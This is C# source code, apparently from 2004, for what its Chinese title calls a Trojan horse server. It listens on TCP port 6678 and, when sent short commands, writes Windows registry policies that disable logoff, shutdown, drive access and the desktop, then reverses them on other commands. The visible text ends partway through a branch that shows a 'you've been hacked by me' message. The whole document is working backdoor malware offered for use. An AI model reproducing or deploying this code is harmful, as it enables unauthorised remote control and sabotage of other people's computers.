特洛伊木马服务器源代码（C#）

特洛伊木马服务器
//wgscd 2004-12 QQ:153964481
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using Microsoft.Win32;


namespace server
{
/// <summary>
/// Form1 的摘要说明。
/// </summary>
public class Form1 : System.Windows.Forms.Form
{
/// <summary>
/// 必需的设计器变量。
/// </summary>
private System.ComponentModel.Container components = null;

private TcpListener listener;
private string mystr="您好！非常抱歉，您的注册表：";
private RegistryKey rrr=Registry.LocalMachine;
private RegistryKey key1;


public Form1()
{
//
// Windows 窗体设计器支持所必需的
//
InitializeComponent();
{int port =6678;
listener=new TcpListener(port);
listener.Start();

Thread thread=new Thread(new ThreadStart(target));
thread.Start();

}

//
// TODO: 在 InitializeComponent 调用后添加任何构造函数代码
//
}
public void target()
{

Socket socket= listener.AcceptSocket();

while(socket.Connected)
{


byte[] by=new Byte[6];
int i=socket.Receive(by,by.Length,0);

string ss=System.Text.Encoding.ASCII.GetString(by);
//OOOOOOOOOOOOOOOOOOOOOOOOOOO以下是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOO

//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jiance")
{
string str="hjc";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);

}
if(ss=="zx1000")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff被修改！请将它置为0！";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff被修改！请将它置为0！";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);


}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//****************************************************************************
if(ss=="zx0100")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",1);
key1.Close();
mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改！请将它置为0！";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",1);
key2.Close();
mystr=mystr+"LocalMachine\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose被修改！请将它置为0！";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if(ss=="zx0100"){
//****************************************************************************

//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zx0010")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);




}//if
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//====================================================================

if(ss=="zx0001")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//=========================================================================
//$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$


if(ss=="zx1100")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoClose",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLOGOff",1);
key2.SetValue("NoClose",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zx1010")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoDrives",12);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDrives被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLOGOff",1);
key2.SetValue("NoDrives",12);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDrives被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//**************************************************
if(ss=="zx1001")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoDesktop",1);
key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDesktop被修改！请将它置为0";

}
catch(Exception ee){MessageBox.Show(ee.Message);}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.SetValue("NoDesktop",1);
key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zx0110")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);

key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zx0101")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);

key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************
if(ss=="zx0011")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);


key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoDrives、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//************************************
if(ss=="zx1110")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDrives被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDrives被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//**************************************
if(ss=="zx1101")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//******************************************
if(ss=="zx1011")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDrives、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoDrives、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//********************************************
if(ss=="zx0111")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",12);
key1.SetValue("NoClose",1);
key1.SetValue("NoDesktop",1);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",12);
key2.SetValue("NoClose",1);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zx1111")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",1);
key1.SetValue("NoClose",1);
key1.SetValue("NoDrives",12);
key1.SetValue("NoDesktop",1);




key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDrives、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",1);
key2.SetValue("NoClose",1);
key2.SetValue("NoDrives",12);
key2.SetValue("NoDesktop",1);

key2.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDrives、NoDesktop被修改！请将它置为0";

}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//*********************************************
//OOOOOOOOOOOOOOOOOOOOOOOOOOO以上是修改注册表OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO

//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以下是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPPPPP


//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&

if(ss=="zs1000")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);


}//if(ss=="")
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
//***********************************************************************
if(ss=="zs0100")
{
try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if(ss=="zx0100"){
//********************************************************************
//++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
if(ss=="zs0010")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",0);
key1.Close();

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);




}//if
//+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
//==================================================================


if(ss=="zs0001")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDesktop",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDesktop",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//=========================================================================
if(ss=="zs1100")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoClose",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLOGOff",0);
key2.SetValue("NoClose",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="zs1010")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoDrives",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");
key2.SetValue("NoLOGOff",0);
key2.SetValue("NoDrives",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//**************************************************
if(ss=="zs1001")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoDesktop",0);
key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.SetValue("NoDesktop",0);
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zs0110")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);

key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zs0101")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);

key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************
if(ss=="zs0011")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);


key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//************************************
if(ss=="zs1110")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoLOGOff、NoClose、NoDrives被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//**************************************
if(ss=="zs1101")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);



key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//******************************************
if(ss=="zs1011")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);



key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//********************************************
if(ss=="zs0111")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoDrives",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDesktop",0);



key1.Close();
mystr=mystr+"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer键值NoClose、NoDrives、NoDesktop被修改！请将它置为0";

}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoDrives",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if
//********************************************
if(ss=="zs1111")
{

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",true);

key1.SetValue("NoLOGOff",0);
key1.SetValue("NoClose",0);
key1.SetValue("NoDrives",0);
key1.SetValue("NoDesktop",0);




key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer");

key2.SetValue("NoLOGOff",0);
key2.SetValue("NoClose",0);
key2.SetValue("NoDrives",0);
key2.SetValue("NoDesktop",0);

key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);



}//if

//PPPPPPPPPPPPPPPPPPPPPPPPPPPP以上是善意修改部分PPPPPPPPPPPPPPPPPPPPPPPPPP

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以下是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
if(ss=="jg0000")
{
MessageBox.Show("你被我黑了!");
